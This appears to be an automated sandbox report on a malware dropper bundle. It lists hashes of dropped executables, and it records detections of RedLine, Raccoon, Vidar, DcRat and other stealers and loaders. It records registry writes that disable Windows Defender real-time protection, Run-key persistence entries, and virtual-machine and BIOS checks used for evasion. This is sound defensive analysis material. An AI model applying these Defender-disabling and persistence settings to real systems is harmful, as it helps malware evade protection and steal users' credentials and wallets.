\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue078a285ef7.exe

MD5 3c95af8f6495e8378f0cd823d134f79f
SHA1 f2719e53eef24c8d415722963b116a754f27b6ee
SHA256 a5bd395e719ccaba9376f81b3b171ec1d1b8c3b43e63d12c578ebefb37a9dee1
SHA512 ba28c3cae074bc63509763f5fbb8c38b0ecf15cef517a7a0a33f781b62657804322935949ab6d0a368e1d6286d65571b2d47f726359fb38b4064f82d8fac15f2

memory/1160-164-0x0000000000000000-mapping.dmp

memory/1800-165-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue078a285ef7.exe

MD5 3c95af8f6495e8378f0cd823d134f79f
SHA1 f2719e53eef24c8d415722963b116a754f27b6ee
SHA256 a5bd395e719ccaba9376f81b3b171ec1d1b8c3b43e63d12c578ebefb37a9dee1
SHA512 ba28c3cae074bc63509763f5fbb8c38b0ecf15cef517a7a0a33f781b62657804322935949ab6d0a368e1d6286d65571b2d47f726359fb38b4064f82d8fac15f2

\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07006d6b7c.exe

MD5 2fa10132cfbce32a5ac7ee72c3587e8b
SHA1 30d26416cd5eef5ef56d9790aacc1272c7fba9ab
SHA256 cfb5c20ec8d95c35f7edb8743084d4491e43c62c575cf0102b4f6781c50689de
SHA512 4e9338f89229bdddb5d7c803a415a338a75962e61ef47984a67efd1e81824ac14039d9abe2b26992a30f6d26c724058518849d71b6d1948c00b08ae95b0fd25a

C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07006d6b7c.exe

MD5 2fa10132cfbce32a5ac7ee72c3587e8b
SHA1 30d26416cd5eef5ef56d9790aacc1272c7fba9ab
SHA256 cfb5c20ec8d95c35f7edb8743084d4491e43c62c575cf0102b4f6781c50689de
SHA512 4e9338f89229bdddb5d7c803a415a338a75962e61ef47984a67efd1e81824ac14039d9abe2b26992a30f6d26c724058518849d71b6d1948c00b08ae95b0fd25a

memory/884-168-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07267c17f2f5.exe

MD5 b4dd1caa1c9892b5710b653eb1098938
SHA1 229e1b7492a6ec38d240927e5b3080dd1efadf4b
SHA256 6a617cd85f6e4fa3861d97d1f8197e909f6ca895a1c6139171d26068656a4c95
SHA512 6285d20d85c2ca38c8dbb92bc8985371cddc9dbe042128e0cc6a48b24e52e5990a196b424a59aa84e551b67c91f5f58894dca2b9c5b130ea78076768e15ecae8

C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07267c17f2f5.exe

MD5 b4dd1caa1c9892b5710b653eb1098938
SHA1 229e1b7492a6ec38d240927e5b3080dd1efadf4b
SHA256 6a617cd85f6e4fa3861d97d1f8197e909f6ca895a1c6139171d26068656a4c95
SHA512 6285d20d85c2ca38c8dbb92bc8985371cddc9dbe042128e0cc6a48b24e52e5990a196b424a59aa84e551b67c91f5f58894dca2b9c5b130ea78076768e15ecae8

memory/1684-172-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07caa83bac5d15.exe

MD5 7068e518575e5ab430815e14b33dd36e
SHA1 887df192fecd39a1c607ffe7552c573f25b9fda3
SHA256 1e4689aea99a6ddcf887e310d985013eb748d6b5cd30a81ec1a26ef154cd0cbd
SHA512 587d711bada21b2421f1a5ddb0beb004a17298c59751f633fd69b0e58983cbc38e0d0992e4ce0a98390aef887f7b81470e7027ff0901431a92b0bf897f7f2f6f

C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07caa83bac5d15.exe

MD5 7068e518575e5ab430815e14b33dd36e
SHA1 887df192fecd39a1c607ffe7552c573f25b9fda3
SHA256 1e4689aea99a6ddcf887e310d985013eb748d6b5cd30a81ec1a26ef154cd0cbd
SHA512 587d711bada21b2421f1a5ddb0beb004a17298c59751f633fd69b0e58983cbc38e0d0992e4ce0a98390aef887f7b81470e7027ff0901431a92b0bf897f7f2f6f

memory/376-178-0x0000000000000000-mapping.dmp

memory/1084-177-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07e35cf558.exe

MD5 210ee72ee101eca4bcbc50f9e450b1c2
SHA1 efea2cd59008a311027705bf5bd6a72da17ee843
SHA256 ccecc31183a26f9949252d33a8207f4e3ddb5a38fa1fbcbd22d7521942a40669
SHA512 8a6eacb4fb610ffb9457025e031824167a5cc6abe4f25168022ead62f6735b43a5e0f72a11d3efdb590f4f583d382d094789530d219113654d1db76c4be50a05

\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue071e59dc8292b4ef1.exe

MD5 b915b5247a3a217eb3cf0996ba2f9378
SHA1 f0ed113a152c1469b1174c9e18abf0a60d240347
SHA256 2a0f230c4a784be4418d778bc8fd8dab23345a5224545480a32d3b0383d5b9ba
SHA512 ba6f7cbfa498c4fcfda7624b2e8dbe3600f953180398bf485e07caedf808bf8f35c44f2009e8e4a95c60e75f09a5028c542ce2a757cd4b778c741ae4285daea8

\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue071e59dc8292b4ef1.exe

MD5 b915b5247a3a217eb3cf0996ba2f9378
SHA1 f0ed113a152c1469b1174c9e18abf0a60d240347
SHA256 2a0f230c4a784be4418d778bc8fd8dab23345a5224545480a32d3b0383d5b9ba
SHA512 ba6f7cbfa498c4fcfda7624b2e8dbe3600f953180398bf485e07caedf808bf8f35c44f2009e8e4a95c60e75f09a5028c542ce2a757cd4b778c741ae4285daea8

C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue071e59dc8292b4ef1.exe

MD5 b915b5247a3a217eb3cf0996ba2f9378
SHA1 f0ed113a152c1469b1174c9e18abf0a60d240347
SHA256 2a0f230c4a784be4418d778bc8fd8dab23345a5224545480a32d3b0383d5b9ba
SHA512 ba6f7cbfa498c4fcfda7624b2e8dbe3600f953180398bf485e07caedf808bf8f35c44f2009e8e4a95c60e75f09a5028c542ce2a757cd4b778c741ae4285daea8

C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07e35cf558.exe

MD5 210ee72ee101eca4bcbc50f9e450b1c2
SHA1 efea2cd59008a311027705bf5bd6a72da17ee843
SHA256 ccecc31183a26f9949252d33a8207f4e3ddb5a38fa1fbcbd22d7521942a40669
SHA512 8a6eacb4fb610ffb9457025e031824167a5cc6abe4f25168022ead62f6735b43a5e0f72a11d3efdb590f4f583d382d094789530d219113654d1db76c4be50a05

memory/1752-183-0x0000000000000000-mapping.dmp

memory/1652-188-0x0000000064940000-0x0000000064959000-memory.dmp

memory/376-193-0x0000000000400000-0x000000000046D000-memory.dmp

memory/376-195-0x0000000000400000-0x000000000046D000-memory.dmp

memory/1512-196-0x0000000000000000-mapping.dmp

memory/1084-198-0x0000000002CC0000-0x0000000002D3B000-memory.dmp

memory/1084-199-0x00000000002C0000-0x0000000000394000-memory.dmp

memory/944-200-0x0000000002D40000-0x0000000002D50000-memory.dmp

memory/944-201-0x0000000000240000-0x0000000000249000-memory.dmp

memory/1672-203-0x0000000000300000-0x0000000000372000-memory.dmp

memory/944-202-0x0000000000400000-0x0000000002B91000-memory.dmp

memory/952-204-0x0000000000070000-0x00000000000A0000-memory.dmp

memory/1084-205-0x0000000000400000-0x0000000002BFB000-memory.dmp

memory/324-206-0x0000000002D90000-0x0000000002DB9000-memory.dmp

memory/1388-209-0x0000000000000000-mapping.dmp

memory/1684-208-0x0000000000C60000-0x0000000000D6E000-memory.dmp

memory/324-207-0x0000000000240000-0x0000000000288000-memory.dmp

memory/324-211-0x0000000000400000-0x0000000002BA9000-memory.dmp

memory/944-212-0x0000000000400000-0x0000000002B91000-memory.dmp

memory/952-213-0x0000000000290000-0x0000000000296000-memory.dmp

memory/2192-214-0x0000000000000000-mapping.dmp

memory/2244-217-0x0000000000000000-mapping.dmp

memory/2232-216-0x0000000000000000-mapping.dmp

memory/2272-220-0x0000000000000000-mapping.dmp

memory/1800-222-0x0000000071460000-0x0000000071A0B000-memory.dmp

memory/2176-223-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2176-224-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2176-226-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2176-227-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2176-228-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2176-229-0x000000000041C5CA-mapping.dmp

memory/2176-231-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2176-233-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2444-235-0x0000000000000000-mapping.dmp

memory/376-238-0x0000000000400000-0x000000000046D000-memory.dmp

memory/2700-237-0x0000000000000000-mapping.dmp

memory/2756-240-0x0000000000000000-mapping.dmp

memory/2800-242-0x0000000000000000-mapping.dmp

memory/2820-243-0x0000000000000000-mapping.dmp

memory/2840-246-0x0000000000000000-mapping.dmp

memory/2880-248-0x0000000000000000-mapping.dmp

memory/1084-251-0x0000000002CC0000-0x0000000002D3B000-memory.dmp

memory/324-252-0x0000000000400000-0x0000000002BA9000-memory.dmp

memory/1084-253-0x0000000000400000-0x0000000002BFB000-memory.dmp

memory/324-254-0x0000000002D90000-0x0000000002DB9000-memory.dmp

memory/2880-255-0x0000000001FF0000-0x0000000002C3A000-memory.dmp

memory/2880-256-0x0000000001FF0000-0x0000000002C3A000-memory.dmp

memory/1800-257-0x0000000071460000-0x0000000071A0B000-memory.dmp

memory/2260-258-0x0000000000000000-mapping.dmp

memory/2280-259-0x0000000000000000-mapping.dmp

memory/2360-261-0x0000000000000000-mapping.dmp

memory/1160-263-0x0000000004390000-0x0000000004535000-memory.dmp

memory/2880-265-0x0000000001FF0000-0x0000000002C3A000-memory.dmp

memory/2424-264-0x0000000000000000-mapping.dmp

memory/2880-266-0x0000000001FF0000-0x0000000002C3A000-memory.dmp

memory/2684-267-0x0000000000000000-mapping.dmp

memory/2708-271-0x0000000000000000-mapping.dmp

memory/2684-270-0x000000000265F000-0x000000000268A000-memory.dmp

memory/1780-269-0x0000000000000000-mapping.dmp

memory/2120-273-0x0000000000000000-mapping.dmp

memory/2796-274-0x0000000000000000-mapping.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2022-08-06 16:06

Reported

2022-08-06 16:08

Platform

win10v2004-20220721-en

Max time kernel

100s

Max time network

153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\CB7D7FE72BDC9B5C0DA00A175AD4354037473B71F8A9F.exe"

Signatures

DcRat

rat infostealer dcrat

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\Documents\SHIsoob4Etj_lU6f_UIAVLsv.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07006d6b7c.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07006d6b7c.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\Documents\SHIsoob4Etj_lU6f_UIAVLsv.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07006d6b7c.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07006d6b7c.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\Documents\SHIsoob4Etj_lU6f_UIAVLsv.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\Documents\SHIsoob4Etj_lU6f_UIAVLsv.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" C:\Users\Admin\Documents\SHIsoob4Etj_lU6f_UIAVLsv.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07006d6b7c.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07006d6b7c.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\Documents\SHIsoob4Etj_lU6f_UIAVLsv.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07006d6b7c.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\Documents\SHIsoob4Etj_lU6f_UIAVLsv.exe N/A

OnlyLogger

loader onlylogger

PrivateLoader

loader privateloader

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\rundll32.exe

Raccoon

stealer raccoon

Raccoon Stealer payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Socelars

stealer socelars

Socelars payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Vidar

stealer vidar

Looks for VirtualBox Guest Additions in registry

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Oracle\VirtualBox Guest Additions C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07caa83bac5d15.exe N/A

OnlyLogger payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Downloads MZ/PE file

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07ef9e317e0f6ae.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue072fdbb8e4b2f5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07e35cf558.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07a633a94f9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue070aab9bc86b572.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07caa83bac5d15.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07b3bf87d8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07267c17f2f5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue071e59dc8292b4ef1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07816149b72db00.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-BF9RV.tmp\Tue07e35cf558.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0750373995e75.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0741bc096fd881d2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07006d6b7c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue078a285ef7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0750373995e75.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07caa83bac5d15.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07caa83bac5d15.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\NiceProcessX64.bmp.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\Service.exe.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\newfile.exe.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\d6cc75213b4f19cbc07bb687f4b12dcc.exe.exe N/A
N/A N/A C:\Program Files (x86)\Installoid\installoid.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\911.bmp.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\zaebalidelete2_2.bmp.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\0.bmp.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\Mixruzki1.bmp.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\bezo.bmp.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\SetupMX_1.bmp.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\wam.bmp.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\blb0l.bmp.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\BKqUCEa.bmp.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\Lammings.bmp.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\manager_like_1.bmp.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\Hfcdvjjdsxvb_crypted_1.bmp.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\zxc_team_1.bmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\yaeblan_v0.7b_2133_windows_64.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\Fenix_2.bmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\instal.exe N/A
N/A N/A C:\Users\Admin\Documents\SHIsoob4Etj_lU6f_UIAVLsv.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\911.bmp.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\Lammings.bmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~4.EXE N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\NiceProcessX64.bmp.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\Lammings.bmp.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\Lammings.bmp.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\setup331.exe.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\ddoAKFf.exe.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\AjyTbkN.exe.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\mixinte.bmp.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\FWsDwwvaVRZQ.bmp.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\d6cc75213b4f19cbc07bb687f4b12dcc.exe.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\chrome.exe.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\B2BCH2.exe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-R890Q.tmp\B2BCH2.exe.tmp N/A

Looks for VMWare Tools registry key

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMware, Inc.\VMware Tools C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07caa83bac5d15.exe N/A

VMProtect packed file

vmprotect
Description Indicator Process Target
N/A N/A N/A N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07caa83bac5d15.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07caa83bac5d15.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\CB7D7FE72BDC9B5C0DA00A175AD4354037473B71F8A9F.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07267c17f2f5.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Pictures\Adobe Films\Service.exe.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Pictures\Adobe Films\911.bmp.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Documents\SHIsoob4Etj_lU6f_UIAVLsv.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Pictures\Adobe Films\setup331.exe.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~4.EXE N/A
Key value queried \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07006d6b7c.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce C:\Users\Admin\Pictures\Adobe Films\wam.bmp.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\Pictures\Adobe Films\wam.bmp.exe N/A
Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce C:\Users\Admin\Pictures\Adobe Films\AjyTbkN.exe.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\Pictures\Adobe Films\ddoAKFf.exe.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Installoid = "\"C:\\Program Files (x86)\\Installoid\\installoid.exe\"" C:\Program Files (x86)\Installoid\installoid.exe N/A
Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce C:\Users\Admin\Pictures\Adobe Films\0.bmp.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\Pictures\Adobe Films\0.bmp.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\Pictures\Adobe Films\AjyTbkN.exe.exe N/A
Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce C:\Users\Admin\Pictures\Adobe Films\ddoAKFf.exe.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

Looks up geolocation information via web service

Maps connected drives based on registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07caa83bac5d15.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07caa83bac5d15.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe C:\Users\Admin\Pictures\Adobe Films\Service.exe.exe N/A
File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe C:\Users\Admin\Pictures\Adobe Films\Service.exe.exe N/A
File created C:\Program Files (x86)\Installoid\installoid.exe C:\Users\Admin\Pictures\Adobe Films\d6cc75213b4f19cbc07bb687f4b12dcc.exe.exe N/A
File opened for modification C:\Program Files (x86)\Installoid\installoid.exe C:\Users\Admin\Pictures\Adobe Films\d6cc75213b4f19cbc07bb687f4b12dcc.exe.exe N/A
File created C:\Program Files (x86)\Installoid\config.json C:\Program Files (x86)\Installoid\installoid.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue071e59dc8292b4ef1.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue078a285ef7.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue078a285ef7.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue078a285ef7.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue078a285ef7.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue078a285ef7.exe
